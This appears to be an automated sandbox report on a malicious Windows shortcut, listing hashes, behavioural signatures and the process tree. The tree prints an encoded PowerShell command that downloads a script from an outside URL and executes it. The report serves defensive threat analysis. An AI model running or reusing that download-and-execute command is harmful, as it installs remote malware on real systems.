Analysis
-
max time kernel
117s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
06-03-2024 12:56
Static task
static1
Behavioral task
behavioral1
Sample
IN_20552055 CP_20552055 D2055.lnk
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
IN_20552055 CP_20552055 D2055.lnk
Resource
win10v2004-20240226-en
General
-
Target
IN_20552055 CP_20552055 D2055.lnk
-
Size
10KB
-
MD5
93562b0626c4db0640dff594fdc44efc
-
SHA1
33d9effa67cae9726124a3432e6913c324b8b716
-
SHA256
a1739e001e0720341f14466231a21bd12a74485dab59b0f4fde7f931467cb4b2
-
SHA512
edf748587ae68606935b495db2c78f9fe4e3198e69bcc7052fca66a14ff148f3aad5530688a715f4c9881783065b81951ccf4201e1f258f8f805eb6eee1e4c98
-
SSDEEP
192:815xsY5jfxXWCBdMNi8L2+6gJuOLdFbi6ppeaHRz2ywmc2sm9Wt:w5Tfxb2ioggJuAr1waHRz2nrgo
Malware Config
Extracted
https://cprismenergia.pt/open.txt
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 3 2784 powershell.exe 4 2784 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2784 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2784 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2628 wrote to memory of 2784 2628 cmd.exe 29 PID 2628 wrote to memory of 2784 2628 cmd.exe 29 PID 2628 wrote to memory of 2784 2628 cmd.exe 29
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\IN_20552055 CP_20552055 D2055.lnk"1⤵
- Suspicious use of WriteProcessMemory
PID:2628 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -EncodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AYwBwAHIAaQBzAG0AZQBuAGUAcgBnAGkAYQAuAHAAdAAvAG8AcABlAG4ALgB0AHgAdAAnACkAIAB8ACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuAA==2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2784
-